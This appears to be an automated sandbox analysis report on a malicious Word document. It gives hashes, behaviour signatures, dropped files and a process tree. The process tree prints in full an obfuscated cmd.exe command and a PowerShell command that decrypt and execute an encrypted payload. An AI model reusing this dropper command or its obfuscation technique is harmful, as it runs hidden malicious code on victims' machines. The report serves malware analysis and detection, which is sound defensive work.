Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 12:32

General

  • Target

    ed97ee2d08454ed55047538abd393544_JaffaCakes118.doc

  • Size

    178KB

  • MD5

    ed97ee2d08454ed55047538abd393544

  • SHA1

    fe69c392b19223592be202974552818de8abd2a9

  • SHA256

    256e95b41be42509e33cfd8730065c8ba6722d46523518a41f605169ce22de69

  • SHA512

    a0c24a1015c5fe7eae785893c76da3073687e3d2eb8e72e7db73ee043c84c2207ee535620e133bb1ec167045fc1fec6607d057c9813d42d7c76c5ebee5813fc6

  • SSDEEP

    1536:4DNVczHkD9icmT+FFdZ+a9BGy4+qiQSLxSBAN0Zg+Zfg9ZchEZP5dIHwMa1vgwKQ:4Dn/iKFf4uOZ6wMwU1cUScys/GO

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed97ee2d08454ed55047538abd393544_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2516
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" btYzdBrPO wbBUhitViSiTJqiVAst GJdLHFAaPD & %C^om^S^pEc% %C^om^S^pEc% /V /c set %HkcqfHrTimwcvYO%=wZGEknMEbCwWha&&set %iUYkizvrDtIs%=p&&set %SastorjCqv%=ow&&set %TTpCsFIpqNSCAqX%=ZBGcfEMYmUX&&set %XzGTSsiL%=!%iUYkizvrDtIs%!&&set %YOdJVmETcmsjInJ%=smhmVjucwPEv&&set %GwIZQaJLmNual%=er&&set %WouPrUP%=!%SastorjCqv%!&&set %WzFrpZBMhR%=s&&set %OGRPXhkaNDwQwXu%=jUwpVVTlEhCrTA&&set %Airnuhr%=he&&set %idloWbckwG%=ll&&!%XzGTSsiL%!!%WouPrUP%!!%GwIZQaJLmNual%!!%WzFrpZBMhR%!!%Airnuhr%!!%idloWbckwG%! "Iex(([rUnTIME.INterOPsERVIcES.MArshAl]::([ruNTimE.InTEroPSerViCES.maRShAl].GeTmEmBerS()[3].nAME).inVoKe([RunTIme.InTErOpsERviCES.MArsHAL]::sEcUResTRINgtOBsTR( $('76492d1116743f0423413b16050a5345MgB8AHgATQBJAFAASQBNADYAcQBiADAASwBIADAAdAAyAEgAWABOAEwAUABiAHcAPQA9AHwANAAxADAANQAwAGQAMQAwADEANgA5ADUAOAAzADAAMgAwADEAZQA2ADcAZAAxADgANwA4ADMAMAAyAGQANAA1ADEAMgAxAGEAMAA0ADEAOQAwADUANgBjADIAOAA3ADEAZgAzADgAMAA1AGUAZgAyAGYAZAAxADQANwA0ADAAMAAwAGQAOQA5AGQAOQBkAGEAYQA5ADgAYwBjADQANwAxADgAMAA5ADMAMQA0ADQAYgAzAGIAYgAxAGQAMQBhADcAMwAyAGEAYgAxADcAMABlADYAZAA3ADIANgA5ADIAZQBmAGIANwBkADgANABmADEANQAyADYAYgBlAGUAZABhAGYAYQBlADEANAAxADMAZAAzADAANwAzAGIAYgBiADgAZgA3ADEAOABmADcAZgA3AGYAMQAwAGMAMgBkAGQAOABmADIAMAA2AGMAMwA1ADUAOQA0AGQANgAyADAAMABmADEAYQBjAGEANAAxADIAZgBlAGYAYgA4AGYAYgA4ADIAZgBkADYAOAAzAGYAMQA0ADYAMQBiADcAOAAwADgANQA1ADcAOAA4ADEAZQA5ADYANAAxAGIAZABkADAANAAyADQANwBkADgAMAA0ADQAYQBlADkANgA4AGUAZgAzADIAMAA1ADIAMQA3AGMANwA4ADMAOABiAGEANgAzADUAMgBlAGQAYQA2AGEAOQA2AGEAZQA2AGMANgA2AGQAYgBlAGEAYgBiADEAZABlAGMAMAA5ADMAMQAwADMAZAA1AGYAOAAxADQAOAA5ADgAMgA4ADUAZAAyADEAZQBjAGQANABiADEANgA5ADQAZAAyAGIAOQBjAGIAOQA3ADkAMgA2ADUAOQA4ADQAMgAwAGMANgA4AGUANgBhADkAOABjAGUAZgA0AGUANgBlAGEAYwA4ADAANwBiAGQAYwBkAGMANAA5ADMAMAA5AGUAOQA5AGQAMABlAGMANwA3AGQAMgA3ADQAYQBjADAANAA1AGIANAAwADgANQBmADgAZABjAGYAMQA2AGQAMgBhADcAYQAyADQAYQA1AGUANgBhAGMAYQBjADgAOAA0AGUAYQA1ADUAZQAxADQAYQA2ADIAYwAzADEAYgBkAGIAZQBhADYAMgAwADYAMAA1AGMAYQBlAGIAZAA0AGUAMABkADcAZABjADEANgBiADUANwBkADYAOABjAGMANQA5ADQAYwBmADAAMgAyADIAYgA4AGMAOQBkADEAMgAxADYAMQA4AGQAMAAwAGIAZQAzAGEANQAxAGIAYgA0ADAAMQA0ADgANQBmADgAOQBlADgAOAA4ADcAMABkADQANQA2ADgAYQAwAGQANAA5ADcAOQAxADAAYwBjADkAOABjADUAOQA0AGQANgBjADkAZQA1AGIAZABjAGEAOQA2ADAANwBmAGYAOABhADcANgA0AGMANwBmAGQANwA5AGMAOQBhAGIAMwAxADkANAAxADAAMwA0ADIAYwA4ADkAZAAzADIAZgAxAGYAMwBkAGYANABjAGYAYwBkAGEAZAAxADUAMAA0ADAAYQAyAGMAZAA5ADAANAAxADIANwBhAGMANwBkADgANwA3AGMAMgAzADIAMwA4ADgAZQA0AGIANgA2AGIAOABlADcAYQBiADIAMwAwADYAYwBlADcAMwBjADAAMQAzAGYAMAAxADkAZABlADcAZAA1ADkAMAA1ADQANgBjAGIAMAA5AGUAMQAwADMAMwAzAGUAZAA0AGYAZQBhADkANQA4ADkANQA2ADYAYQA2ADMANQAxAGUAMgAzADIAZQBhADIAYgAxADAAMABmADgANQA3ADMAOQAxAGYANgAxADAAMQA5ADkAYwBmADYAZQBjAGUANABlADQAOAA4ADAAYgAyAGIANgBmADUAZAA3ADgANQAxAGEAMAA0AGYAZQA3AGIAZAA0ADgANgAxAGYAMwA3ADkAMQBlADQAOQA5AGMAYQBkADAAZQBjADUAMQA5ADUANwAxAGYAMgAwAGIANwAxAGQAYwA4ADQANwBjAGIAOAAwADQAMAA5ADMAMQAwADYAYgA1AGYANgA4ADIAOAA2ADkAMQA5AGMAYQAzADMAYgBkADAAZABlADgAOAA4AGIANwAwAGQAZQAwADMAZQA1AGEAZgA3AGUAZQA5ADcAOAA0ADYAMABmADgAOQA2ADQAOAAyAGQAYwBkAGQAOAA1AGYAZABlADAANgBkAGMAMAA0AGEAYgAwAGUANgBkADMAMgA3ADgAZQA0ADgAZQBmADIAMAAwAGEAMQAzAGEAZgAzAGMAMABkAGMANABmADQAMwA5ADYAZgBlAGIAYQBhAGEAZQAxAGUAOQA1AGEAYQBjAGMAYgBlADAAYgBlADYANABjADgAZgA1AGIANwAzADYAMAAwAGUAOABhADYAMABiAGMAOQAzAGQAMAA2ADUAZgAwADgAMQA1AGYAOAAwADcAZABmAGIAOAA0ADUANQBjAGUANgA2AGYAMAAzAGQAMQBhAGYAMABhADMAYQBiADkAMAA4ADEAYgA0AGQANABhADQAOAA4ADAAYQBhAGUAZgAyADYAMAA3ADEAMABhADEANABjAGEAYQA4ADUAMwA3ADEAMABhADcAZQA0AGIAMABlADYAYgAzAGMAZAAxAGIAYwAzAGUANwA0AGYAMwA3ADQAMwAyAGQANQBhADcANABhAGUANgA1AGYAMAA0AGYAYQBkADYAZQBmAGUAOQAwAGMAMQBlAGUAMQBlAGYAYgA4ADIAMgA3AGEAYgA0AGMAYQAxADAAMgBiAGIAMAA4ADYANgBiAGIANwA1AGEAMQAyAGQAZQA5ADYAYwA0AGMAZABiADAANQBhADkAMwBkAGQAZAA2ADYAYgAxAGUAOAAxADUAYgBkAGYAMQBiADIANABiADIAMQBlADcAOABlAGQAZQAyADEAMAA4AGQAYwAzADgANgA4AGYAMgBiADgAZQBmADQANgBjADEAYQA5ADIAYwAzAGYANgAwADUAYwBjADUAMAAzADcAMgAxADgAMAA2ADkAMABlAGIAMAA5ADIAZABhADgAMwAwADEANwBkADgAYgA0AGIAZgBlADkAMAA1ADAAYQAxADEAMAA5ADQAZgA4ADYANgBhADMAOQBmADIAYgBhADUANAA1AGYAOAAyADEAZQBlADQAOQA4ADgAYwA4ADgANgAzAGQAYQA4ADIAZgBjADAAMwA0AGEAMQAwADQANwAzAGEAZAA0AGMAMwA4ADIAYgA3ADYAMAAwAGQANgA4AGIAMwBhAGYANwBhADcAOABlADUAMAA5ADIANAA2AGQAMAA5AGUAYQBiAGIAZABjADUAZAA4AGYAZQAxAGEAMQA3ADIAYgBjADMANgBkADgANQA3ADEANABhADMAMwBlAGQAYQBkADYAYQA2AGYAMgAxADAAZABkAGUANgBkAGUANABhADEAYgAzAGIAMgBlAGEAYQA5ADIAZAA2ADYAYgA1ADEAOABiADIAMAAzAGUAMABhADAAYQAwADgAZgAxAGMANwAyADkAZQA4AGIAMQBhADUAYwAzAGQANQBmAGEAYgA4AGUAMABkADEANwBmADYAZgA5AGMAZAA2AGYAOQA0ADgAMgA3ADUAYwAyADcANwA0AGUAMAAwADkAMgAyADMANQA4ADQAOQBhADMANAA5ADUAYwBmADUAZQA5ADEAMwA2AGYAYwBmADkAOABkADUAMgBjADMAZgA1AGEANgBjADMAYgBjAGIANgAzAGEAMQA2ADEAYgAwAGUAOABjADQANQA3ADYAMwAzAGEAOQA0ADMAZQA5ADkAYQAwADIAMQBkAGQANgBiADcANQAxADEAOAA2ADcANgBhADgANgA3ADUANgBhADUAMgA0ADAAYwA5ADIAMABjADcAZgAyADIAZABjADcAZQBkADcAYgA0AGIAMwBkAGYAZQA0ADQAOQAwAGQAZQBkADEAOQBiADEAOQAyAGMAMAA4ADQAZABmAGMAMgA2AGYAMAAxAGUAYwA3ADYAOQA0AGYAYQBmADAAMABlADcAOABkADYANgA3ADEAOAA5AGQAMwAzAGIAZgBkAGQAYwBmADQAYgBiADcAZQBkADUAZAA2ADQANAAwAGIANQBlADcANgAzADkAMQBiADkANAA3AA=='| ConVErtto-secUreSTrING -kE 38,121,176,251,225,133,130,146,96,162,134,217,185,23,42,29,16,243,125,131,194,149,53,96,234,239,102,97,83,35,87,204) ) )) )
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "Iex(([rUnTIME.INterOPsERVIcES.MArshAl]::([ruNTimE.InTEroPSerViCES.maRShAl].GeTmEmBerS()[3].nAME).inVoKe([RunTIme.InTErOpsERviCES.MArsHAL]::sEcUResTRINgtOBsTR( $('76492d1116743f0423413b16050a5345MgB8AHgATQBJAFAASQBNADYAcQBiADAASwBIADAAdAAyAEgAWABOAEwAUABiAHcAPQA9AHwANAAxADAANQAwAGQAMQAwADEANgA5ADUAOAAzADAAMgAwADEAZQA2ADcAZAAxADgANwA4ADMAMAAyAGQANAA1ADEAMgAxAGEAMAA0ADEAOQAwADUANgBjADIAOAA3ADEAZgAzADgAMAA1AGUAZgAyAGYAZAAxADQANwA0ADAAMAAwAGQAOQA5AGQAOQBkAGEAYQA5ADgAYwBjADQANwAxADgAMAA5ADMAMQA0ADQAYgAzAGIAYgAxAGQAMQBhADcAMwAyAGEAYgAxADcAMABlADYAZAA3ADIANgA5ADIAZQBmAGIANwBkADgANABmADEANQAyADYAYgBlAGUAZABhAGYAYQBlADEANAAxADMAZAAzADAANwAzAGIAYgBiADgAZgA3ADEAOABmADcAZgA3AGYAMQAwAGMAMgBkAGQAOABmADIAMAA2AGMAMwA1ADUAOQA0AGQANgAyADAAMABmADEAYQBjAGEANAAxADIAZgBlAGYAYgA4AGYAYgA4ADIAZgBkADYAOAAzAGYAMQA0ADYAMQBiADcAOAAwADgANQA1ADcAOAA4ADEAZQA5ADYANAAxAGIAZABkADAANAAyADQANwBkADgAMAA0ADQAYQBlADkANgA4AGUAZgAzADIAMAA1ADIAMQA3AGMANwA4ADMAOABiAGEANgAzADUAMgBlAGQAYQA2AGEAOQA2AGEAZQA2AGMANgA2AGQAYgBlAGEAYgBiADEAZABlAGMAMAA5ADMAMQAwADMAZAA1AGYAOAAxADQAOAA5ADgAMgA4ADUAZAAyADEAZQBjAGQANABiADEANgA5ADQAZAAyAGIAOQBjAGIAOQA3ADkAMgA2ADUAOQA4ADQAMgAwAGMANgA4AGUANgBhADkAOABjAGUAZgA0AGUANgBlAGEAYwA4ADAANwBiAGQAYwBkAGMANAA5ADMAMAA5AGUAOQA5AGQAMABlAGMANwA3AGQAMgA3ADQAYQBjADAANAA1AGIANAAwADgANQBmADgAZABjAGYAMQA2AGQAMgBhADcAYQAyADQAYQA1AGUANgBhAGMAYQBjADgAOAA0AGUAYQA1ADUAZQAxADQAYQA2ADIAYwAzADEAYgBkAGIAZQBhADYAMgAwADYAMAA1AGMAYQBlAGIAZAA0AGUAMABkADcAZABjADEANgBiADUANwBkADYAOABjAGMANQA5ADQAYwBmADAAMgAyADIAYgA4AGMAOQBkADEAMgAxADYAMQA4AGQAMAAwAGIAZQAzAGEANQAxAGIAYgA0ADAAMQA0ADgANQBmADgAOQBlADgAOAA4ADcAMABkADQANQA2ADgAYQAwAGQANAA5ADcAOQAxADAAYwBjADkAOABjADUAOQA0AGQANgBjADkAZQA1AGIAZABjAGEAOQA2ADAANwBmAGYAOABhADcANgA0AGMANwBmAGQANwA5AGMAOQBhAGIAMwAxADkANAAxADAAMwA0ADIAYwA4ADkAZAAzADIAZgAxAGYAMwBkAGYANABjAGYAYwBkAGEAZAAxADUAMAA0ADAAYQAyAGMAZAA5ADAANAAxADIANwBhAGMANwBkADgANwA3AGMAMgAzADIAMwA4ADgAZQA0AGIANgA2AGIAOABlADcAYQBiADIAMwAwADYAYwBlADcAMwBjADAAMQAzAGYAMAAxADkAZABlADcAZAA1ADkAMAA1ADQANgBjAGIAMAA5AGUAMQAwADMAMwAzAGUAZAA0AGYAZQBhADkANQA4ADkANQA2ADYAYQA2ADMANQAxAGUAMgAzADIAZQBhADIAYgAxADAAMABmADgANQA3ADMAOQAxAGYANgAxADAAMQA5ADkAYwBmADYAZQBjAGUANABlADQAOAA4ADAAYgAyAGIANgBmADUAZAA3ADgANQAxAGEAMAA0AGYAZQA3AGIAZAA0ADgANgAxAGYAMwA3ADkAMQBlADQAOQA5AGMAYQBkADAAZQBjADUAMQA5ADUANwAxAGYAMgAwAGIANwAxAGQAYwA4ADQANwBjAGIAOAAwADQAMAA5ADMAMQAwADYAYgA1AGYANgA4ADIAOAA2ADkAMQA5AGMAYQAzADMAYgBkADAAZABlADgAOAA4AGIANwAwAGQAZQAwADMAZQA1AGEAZgA3AGUAZQA5ADcAOAA0ADYAMABmADgAOQA2ADQAOAAyAGQAYwBkAGQAOAA1AGYAZABlADAANgBkAGMAMAA0AGEAYgAwAGUANgBkADMAMgA3ADgAZQA0ADgAZQBmADIAMAAwAGEAMQAzAGEAZgAzAGMAMABkAGMANABmADQAMwA5ADYAZgBlAGIAYQBhAGEAZQAxAGUAOQA1AGEAYQBjAGMAYgBlADAAYgBlADYANABjADgAZgA1AGIANwAzADYAMAAwAGUAOABhADYAMABiAGMAOQAzAGQAMAA2ADUAZgAwADgAMQA1AGYAOAAwADcAZABmAGIAOAA0ADUANQBjAGUANgA2AGYAMAAzAGQAMQBhAGYAMABhADMAYQBiADkAMAA4ADEAYgA0AGQANABhADQAOAA4ADAAYQBhAGUAZgAyADYAMAA3ADEAMABhADEANABjAGEAYQA4ADUAMwA3ADEAMABhADcAZQA0AGIAMABlADYAYgAzAGMAZAAxAGIAYwAzAGUANwA0AGYAMwA3ADQAMwAyAGQANQBhADcANABhAGUANgA1AGYAMAA0AGYAYQBkADYAZQBmAGUAOQAwAGMAMQBlAGUAMQBlAGYAYgA4ADIAMgA3AGEAYgA0AGMAYQAxADAAMgBiAGIAMAA4ADYANgBiAGIANwA1AGEAMQAyAGQAZQA5ADYAYwA0AGMAZABiADAANQBhADkAMwBkAGQAZAA2ADYAYgAxAGUAOAAxADUAYgBkAGYAMQBiADIANABiADIAMQBlADcAOABlAGQAZQAyADEAMAA4AGQAYwAzADgANgA4AGYAMgBiADgAZQBmADQANgBjADEAYQA5ADIAYwAzAGYANgAwADUAYwBjADUAMAAzADcAMgAxADgAMAA2ADkAMABlAGIAMAA5ADIAZABhADgAMwAwADEANwBkADgAYgA0AGIAZgBlADkAMAA1ADAAYQAxADEAMAA5ADQAZgA4ADYANgBhADMAOQBmADIAYgBhADUANAA1AGYAOAAyADEAZQBlADQAOQA4ADgAYwA4ADgANgAzAGQAYQA4ADIAZgBjADAAMwA0AGEAMQAwADQANwAzAGEAZAA0AGMAMwA4ADIAYgA3ADYAMAAwAGQANgA4AGIAMwBhAGYANwBhADcAOABlADUAMAA5ADIANAA2AGQAMAA5AGUAYQBiAGIAZABjADUAZAA4AGYAZQAxAGEAMQA3ADIAYgBjADMANgBkADgANQA3ADEANABhADMAMwBlAGQAYQBkADYAYQA2AGYAMgAxADAAZABkAGUANgBkAGUANABhADEAYgAzAGIAMgBlAGEAYQA5ADIAZAA2ADYAYgA1ADEAOABiADIAMAAzAGUAMABhADAAYQAwADgAZgAxAGMANwAyADkAZQA4AGIAMQBhADUAYwAzAGQANQBmAGEAYgA4AGUAMABkADEANwBmADYAZgA5AGMAZAA2AGYAOQA0ADgAMgA3ADUAYwAyADcANwA0AGUAMAAwADkAMgAyADMANQA4ADQAOQBhADMANAA5ADUAYwBmADUAZQA5ADEAMwA2AGYAYwBmADkAOABkADUAMgBjADMAZgA1AGEANgBjADMAYgBjAGIANgAzAGEAMQA2ADEAYgAwAGUAOABjADQANQA3ADYAMwAzAGEAOQA0ADMAZQA5ADkAYQAwADIAMQBkAGQANgBiADcANQAxADEAOAA2ADcANgBhADgANgA3ADUANgBhADUAMgA0ADAAYwA5ADIAMABjADcAZgAyADIAZABjADcAZQBkADcAYgA0AGIAMwBkAGYAZQA0ADQAOQAwAGQAZQBkADEAOQBiADEAOQAyAGMAMAA4ADQAZABmAGMAMgA2AGYAMAAxAGUAYwA3ADYAOQA0AGYAYQBmADAAMABlADcAOABkADYANgA3ADEAOAA5AGQAMwAzAGIAZgBkAGQAYwBmADQAYgBiADcAZQBkADUAZAA2ADQANAAwAGIANQBlADcANgAzADkAMQBiADkANAA3AA=='| ConVErtto-secUreSTrING -kE 38,121,176,251,225,133,130,146,96,162,134,217,185,23,42,29,16,243,125,131,194,149,53,96,234,239,102,97,83,35,87,204) ) )) )
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2752

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      c2e290b648e4bb19babc5567a8ba8ab6

      SHA1

      4b18fefc411cea49c8bb4ca002751994e1dda5a8

      SHA256

      784b091157cf364b88b22fc67967eacf564222a5832d8cd5389790349a36902b

      SHA512

      0ddaf938e3f0f92e95334aba79ebccde4c5642e542d5d748050a2f556f2b77ad64ed94d6c527fe24ea25883bf5e89f85d9188255455a3093ac4b66ff60d43a9b

    • memory/2520-14-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-11-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-19-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-25-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-24-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-22-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-21-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-17-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-16-0x00000000065C0000-0x00000000066C0000-memory.dmp

      Filesize

      1024KB

    • memory/2520-0-0x000000002FA71000-0x000000002FA72000-memory.dmp

      Filesize

      4KB

    • memory/2520-2-0x000000007144D000-0x0000000071458000-memory.dmp

      Filesize

      44KB

    • memory/2520-23-0x00000000065C0000-0x00000000066C0000-memory.dmp

      Filesize

      1024KB

    • memory/2520-12-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-8-0x00000000065C0000-0x00000000066C0000-memory.dmp

      Filesize

      1024KB

    • memory/2520-29-0x000000007144D000-0x0000000071458000-memory.dmp

      Filesize

      44KB

    • memory/2520-30-0x00000000065C0000-0x00000000066C0000-memory.dmp

      Filesize

      1024KB

    • memory/2520-31-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-32-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/2520-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2520-47-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2520-48-0x000000007144D000-0x0000000071458000-memory.dmp

      Filesize

      44KB